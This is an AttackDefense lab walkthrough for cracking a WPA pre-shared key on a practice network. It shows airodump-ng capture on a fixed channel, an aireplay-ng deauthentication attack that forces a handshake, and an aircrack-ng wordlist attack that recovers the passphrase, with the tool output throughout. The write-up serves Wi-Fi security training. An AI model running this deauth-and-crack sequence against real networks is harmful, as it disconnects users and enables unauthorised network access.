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Name	Live Cracking: WPA PSK
URL	https://www.attackdefense.com/challengedetails?cid=1255
Туре	Wi-Fi Attack-Defense : Live Cracking

Important Note: This document illustrates all the important steps required to complete this lab. This is by no means a comprehensive step-by-step solution for this exercise. This is only provided as a reference to various commands needed to complete this exercise and for your further research on this topic. Also, note that the IP addresses and domain names might be different in your lab.

Objective: Crack the WPA handshake for the network and get the network pre-shared passphrase!

Solution:

Step 1: Check the list of available WiFi network interfaces on the machine

Command: iw dev.

```
root@attackdefense:~# iw dev
phy#2
Interface wlan0
ifindex 6
wdev 0x200000001
addr 02:00:00:00:00:00
type managed
txpower 0.00 dBm
root@attackdefense:~#
```

wlan0 interface is present on the machine.

Step 2: Run airodump-ng on wlan0 interface to view all networks present in the vicinity on 2.4 (b/g) Ghz band.

Command: airodump-ng wlan0

root@attackdefense:~# airodump-ng wlan0

```
CH 4 ][ Elapsed: 0 s ][ 2019-10-07 07:34
BSSID
                        Beacons
                                    #Data, #/s
                                                                      AUTH ESSID
                                                CH
                                                     MB
                                                          ENC CIPHER
A2:E9:68:D3:03:10
                                                              TKIP
                                                                           HackMeIfYouCan
BSSID
                   STATION
                                       PWR
                                                                     Notes Probes
                                             Rate
                                                     Lost
                                                             Frames
```

SSID "HackMelfYouCan" is operating on channel 6.

Step 3: Fix the wlan0 on channel 6 (Instead of hopping on multiple channels) and write the captured packets into a file named "test"

Command: airodump-ng wlan0 -c 6 -w test

root@attackdefense:~# airodump-ng wlan0 -c 6 -w test

```
CH 6 ][ Elapsed: 12 s ][ 2019-10-07 07:35
BSSID
                   PWR RXQ Beacons
                                       #Data, #/s
                                                   CH
                                                        MB
                                                             ENC CIPHER AUTH ESSID
A2:E9:68:D3:03:10
                                142
                                                    6
                                                                         PSK HackMeIfYouCan
                 -28
                                                        11
BSSID
                   STATION
                                      PWR
                                            Rate
                                                    Lost
                                                            Frames
                                                                    Notes Probes
A2:E9:68:D3:03:10 02:00:00:00:02:00
                                                                            HackMeIfYouCan
                                      -29
                                             0 - 1
                                                        0
                                                                 1
```

A client is also connected to this SSID.

Step 4: A WPA 4-way handshake is required to launch cracking attack. Send deauth packets to all clients connected to BSSID A2:E9:68:D3:03:10 to disconnect those (Only one client in this scenario). When the client will reconnect to the BSSID, the handshake should be captured by airodump-ng.

Command: aireplay-ng -0 100 -a A2:E9:68:D3:03:10 wlan0

```
root@attackdefense:~# aireplay-ng -0 100 -a A2:E9:68:D3:03:10 wlan0 07:36:20 Waiting for beacon frame (BSSID: A2:E9:68:D3:03:10) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 07:36:20 Sending DeAuth (code 7) to broadcast -- BSSID: [A2:E9:68:D3:03:10] 07:36:21 Sending DeAuth (code 7) to broadcast -- BSSID: [A2:E9:68:D3:03:10] 07:36:22 Sending DeAuth (code 7) to broadcast -- BSSID: [A2:E9:68:D3:03:10] 07:36:22 Sending DeAuth (code 7) to broadcast -- BSSID: [A2:E9:68:D3:03:10]
```

07:36:23 Sending DeAuth (code 7) to broadcast -- BSSID: [A2:E9:68:D3:03:10]

The client got disconnected and reconnected to the AP. And, the handshake is captured by airodump-ng.

```
CH 6 ][ Elapsed: 1 min ][ 2019-10-07 07:37 ][ WPA handshake: A2:E9:68:D3:03:10
                                     #Data, #/s CH
BSSID
                  PWR RXQ Beacons
                                                     MB
                                                          ENC CIPHER AUTH ESSID
A2:E9:68:D3:03:10 -28 100
                             1019
                                        11
                                                     11
                                                          WPA TKIP
                                                                     PSK HackMeIfYouCan
BSSID
                  STATION
                                    PWR
                                         Rate
                                                         Frames Notes Probes
                                                 Lost
                                                             20 EAPOL HackMeIfYouCan
A2:E9:68:D3:03:10 02:00:00:00:02:00 -29
                                           1 - 1
                                                     0
```

Step 5: Exit airodump-ng and run aircrack-ng on captured packet file (i.e. test.cap)

Command: aircrack-ng -w 100-common-passwords.txt test-01.cap

```
root@attackdefense:~# aircrack-ng -w 100-common-passwords.txt test-01.cap
```

The Pre-shared key is "friendship"

Flag: friendship